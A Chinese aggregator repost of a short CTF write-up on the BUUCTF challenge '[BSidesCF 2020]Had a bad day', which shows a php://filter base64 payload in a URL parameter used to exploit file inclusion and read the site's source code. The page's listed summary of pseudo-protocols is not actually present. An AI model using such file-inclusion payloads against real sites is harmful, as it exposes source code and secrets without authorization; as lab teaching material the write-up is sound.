【CTF】ctf中用到的php伪协议总结及例题（持续更）

php 网络安全 ctf 2023-09-01 16:09:29 130人浏览八月长安

摘要

目录前言关于文件包含漏洞 php伪协议总结关于php://协议参考自：前言本篇文章使用的靶场是buuctf上的WEB题目：[BSidesCF 2020]Had a bad day 进行点击选项得到一个这样的url 这里

前言

前言

本篇文章使用的靶场是buuctf上的WEB题目：[BSidesCF 2020]Had a bad day

进行点击选项得到一个这样的url

这里猜测存在sql注入，没测出来。或者可能有PHP伪协议读取

php://filter/convert.base64-encode/resource=index.php

发现后缀变为.php.php，现在改为

php://filter/convert.base64-encode/resource=index

http://f650f9e6-2c5b-4422-bdf8-9a42ed816d99.node4.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resource=index

php伪协议读取源码，并进行base64解码，得到源码。

                      Had a bad day?    来源地址：https://blog.csdn.net/weixin_52450702/article/details/128847478



您可能感兴趣的文档:

Elasticsearch-PHP 中文文档
PHP 内核与原生扩展开发
Composer 中文文档



--结束END--
 本文标题: 【CTF】ctf中用到的php伪协议总结及例题（持续更）
 本文链接: https://lsjlt.com/news/388978.html(转载时请注明来源链接)
有问题或投稿请发送至:
邮箱/279061341@qq.com    QQ/279061341




猜你喜欢







【CTF】ctf中用到的php伪协议总结及例题（持续更）
 目录 前言 关于文件包含漏洞 php伪协议总结 关于php://协议 参考自：   前言  本篇文章使用的靶场是buuctf上的web题目：[BSidesCF 2020]Had a bad day 进行点击选项得到一个这样的url   这里...

 




99+
2023-09-01

php
网络安全
ctf






软考高级职称资格查询








热门wiki










mysql删除数据恢复

mysql删表能回滚吗

mysql找回删除的表

mysql不小心删除了表

mysql不小心把表删了怎么恢复数据

mysql数据表删除后能恢复么

mysql误删表数据恢复

mysql误删表恢复

mysql删除表怎么恢复

mysql删除表











近期文章










【PHP小课堂】PHP中的数组函数学习（三）

LaravelORM+协程在Webman中的应用

2024最新Consul集群搭建看这篇就够了

php如何实现高并发

PHP XSS防御：构建坚固的网络安全基础

PHP XSS防范：确保你的网站安全可靠

PHP XSS预防措施：保护你的网站免受恶意攻击

PHP XSS防护：网络安全的关键

PHP XSS防御：保护你的网站免受黑客入侵

PHP XSS防范：建立牢不可破的网络安全











推荐阅读











php变量作用域是什么

2024-02-29







PHP isset按钮不起作用怎么解决

2024-02-29







php中target标签怎么使用

2024-02-29







php怎么获取网页内容

2024-02-29







php怎么实现批量发送邮件

2024-02-29







PHP方法参数传递及返回值详解

2024-02-29







PHP7下载PDF文件失败的解决方法

2024-02-29







最佳在线PHP编辑器：快速创建文件

2024-02-29







解决PHP数据库中爱好无法显示的问题

2024-02-29







PHP验证码复制粘贴问题解决方法分享

2024-02-29
















热门问答













1
回答

如何调试操作系统的错误？
操作系统




2023-11-15发布






1
回答

操作系统中的I/O系统是如何实现的？
操作系统




2023-11-15发布






1
回答

如何实现操作系统的内存管理？
操作系统




2023-11-15发布






1
回答

什么是虚拟内存，它对操作系统有什么影响？
操作系统




2023-11-15发布






1
回答

ASP中的MVC架构和WebForms架构有什么区别和使用场景？
ASP.NET




2023-11-15发布






1
回答

ASP中的数据验证和数据校验有什么不同？
ASP.NET




2023-11-15发布






1
回答

ASP中的ADO对象和DAO对象有什么区别和使用方法？
ASP.NET




2023-11-15发布






1
回答

Node.js中的包管理器NPM是什么？如何使用它进行依赖管理？
node.js




2023-11-15发布






1
回答

Vue.js中的动态组件是什么？如何使用它来动态渲染组件？
VUE




2023-11-15发布






1
回答

如何使用Vue.js实现懒加载和预加载？
VUE




2023-11-15发布













热门标签





Python操作PostgreSQL
Python连接PostgreSQL
Python连接和操作PostgreSQL
SQL建表语句
SQL建表语句使用
RedisTemplate使用
MySQL提取数据
JSON提取数据
MySQL从JSON提取数据
MySQL免密登录
MySQL免密登录配置
Oracle端口
Oracle修改端口
Oracle更换端口
Oracle更换监听端口
HBASE部署
HBASE集群部署
oracle中的trunc函数
oracle中trunc
winx64安装
格式化yyyy-mm-dd
mysql时间戳格式化yyyy-mm-dd
mysql8.0.15重置密码
mysql8.0.15修改密码
2059
Navicat连接MySQL出现2059
DBeaver导入数据
DBeaver导入excel大量数据
DBeaver导入excel数据
dbeaver导出